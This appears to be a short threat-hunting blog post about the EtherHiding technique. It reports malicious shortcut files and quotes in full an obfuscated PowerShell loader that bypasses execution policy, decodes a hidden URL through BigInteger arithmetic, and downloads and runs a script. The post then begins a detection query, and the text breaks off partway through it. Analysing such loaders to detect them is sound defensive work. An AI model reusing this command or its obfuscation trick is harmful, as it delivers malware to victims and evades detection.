402. Adversaries Keep Actively Using the EtherHiding Technique
Hello everyone! Threat actors continue to actively use the EtherHiding technique, and today we'll look at another example of it in action. According to a report by LevelBlue , the attackers distributed malicious shortcut (.LNK) files. Interacting with these shortcuts resulted in the execution of an obfuscated PowerShell command, for example: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $Se4n4GmJ=[System.Numerics.BigInteger]\7330349723455890650683895074414054;$fobLzAK0=[System.Numerics.BigInteger]\5070886814366709789648062014091648;$YrXdQd=$Se4n4GmJ - $fobLzAK0;for($bwusN=100+156;$YrXdQd -ne 0;$YrXdQd=$YrXdQd / $bwusN){$JZwuEnBA+=[char]\([int]\($YrXdQd % $bwusN));};iwr $JZwuEnBA -OutFile $env\:TEMP\lFdlPb.ps1 -UseBasicParsing; powershell -ep bypass -File $env\:TEMP\lFdlPb.ps1 Notice that the obfuscation leverages the BigInteger type, which by itself provides an opportunity for hunting: event_type: "processcreatewin" AND proc_file_path: "powe...